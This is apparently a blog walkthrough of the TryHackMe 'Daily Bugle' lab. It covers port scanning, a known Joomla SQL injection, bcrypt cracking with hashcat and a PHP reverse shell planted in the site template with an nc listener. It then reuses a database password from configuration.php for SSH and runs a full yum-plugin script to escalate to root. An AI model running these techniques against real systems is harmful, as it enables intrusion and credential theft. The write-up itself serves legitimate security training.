Daily Bugle

TryHackMe Room: https://tryhackme.com/room/dailybugle
Difficulty Rated: Hard.

Compromise a Joomla CMS account via SQLi, practise cracking hashes and escalate your privileges by taking advantage of yum.

Firstly let’s do a quick nmap scan to see what ports are open.
nmap -sV -p- -vv IP

We have three ports open 80 (HTTP), 22 (ssh) and 3306 (MariaDB), since it has an open HTTP port then surely it must have a webpage or even some sort of content.

It looks like we have a Joomla CMS setup, and a post about someone.

Flag1: “Access the webserver, who robbed the bank?” Hopefully, you’re about to find the answer, as it’s “front” page news!

Let’s see what else this website is hiding from us, let’s get the go buster going!

gobuster dir -u http://10.10.181.48/ -t 50 -w directory-list-2.3-medium.txt
It seems Gobuster has found us some excellent results we can use, we have a robots.txt page.
The robots.txt page doesn’t include anything we don’t already know.

The administrator page requires a login, which we don’t have yet sadly.

Flag2: “What is the Joomla version?” So we need to find what version of Joomla is running here, OWASP has a tool which can do just that for us!

perl joomscan.pl -u http://10.10.181.48/

And just like that, we have our version of Joomla for Flag2!

Flag3: “Instead of using SQLMap, why not use a python script! What is Jonah’s cracked password?”

Flag 3 is giving us a hint here, we know the version of Joomla, and if we do a quick Google search, we can see that the version has an exploit.

We found our user, but the password encrypted with Bcrypt “3200 – Hashcat” I guess now it’s time to crack it, using Hashcat and rockyou.txt.

hashcat -D 2 -m 3200 HASHFILE WORDLIST
We have our password and Flag3! I’m using a Windows cracking rig due to better driver support. However, Hashcat works on both Windows and Linux, and the commands are the same.

Now we can log in into the administrator page, now that we have accessed our next goal to try and get a reverse shell. There are two methods on how we can do this.

Method one is to upload the shell within the uploader, but first, you must allow .php and other files to be uploaded. System – Global Configuration – Media, once edited you can upload your shell file freely (Hopefully?)

Method two is the most common, and that is to edit the theme itself and include your own reverse shell PHP shell and refresh the page to get your shell started. You can gain a copy of the PHP shell here. Once you have it downloaded and extracted ensure you change to your IP and your chosen port! (Or it won’t connect back to anything).

Before we upload our shell, we should firstly set up NC on our attacker system.

nc -nvlp 1234

“1234” is the port, ensure you change it to the one you set within your PHP shell, an IP address isn’t needed as listens to all devices but only on the given port.

Once you’re ready to head to the theme editor, Templates – Templates – Protostar Details and Files. You should see this screen.

We want to edit index.php, open index.php within the editor and paste all of your PHP shellcode, don’t forget to click on save!
Reload the website, the website should keep “loading”, as right now it’s connecting back to us the attacker on the given IP and port. If all done correctly, we should see a connection in our NC terminal.

Now we have our shell into the system lets see what users are on this system.

cat /etc/passwd

We have jjameson and root. Let’s try and access jjameson home; dang looks like we can’t as we don’t have the correct permissions as were only running as apache.

Let’s see if we can sudo -l, sadly no luck here. Let’s see what distro is running here as we need to get higher permissions if we do want to get the last two flags!

It doesn’t look like much here can help us sadly, let’s have a more in-depth look into the Joomla setup.

cd /var/www/html && ls
Lot’s of files here. But, that configuration.php file looks like it might be of some use to us let’s cat it.

Using cat, we can see the file has much information, but the “password” really stands out here, I wonder if that gives us ssh access to jjameson?

We now have ssh access to jjameson! And with this, we can claim Flag4 in user.txt within jjameson’s home folder.

Now we need to get Flag5, and we can complete this room, the only issue here is. Flag5 is root access only, and we don’t have root access. I guess it’s time to bypass our restrictions and get root!

If we use the command sudo -l we can see
“(ALL) NOPASSWD: /usr/bin/yum”, we can abuse yum and get root!

Using the following:

TF=$(mktemp -d)
cat >$TF/x<<EOF
[main]
plugins=1
pluginpath=$TF
pluginconfpath=$TF
EOF

cat >$TF/y.conf<<EOF
[main]
enabled=1
EOF

cat >$TF/y.py<<EOF
import os
import yum
from yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE
requires_api_version='2.1'
def init_hook(conduit):
  os.execl('/bin/sh','/bin/sh')
EOF

sudo yum -c $TF/x --enableplugin=y
We abused yum to successfully gain a root shell.
We got root! We can now get the last flag, and Flag5 is within /root/root.txt

That’s it! We started off gaining admin access to Joomla; we uploaded a shell and gained access to the system. We used our shell to gain higher permissions and now were root!

This room created by TryHackMe. Thank you so much for the fun room!

Leave a Comment

Your email address will not be published. Required fields are marked *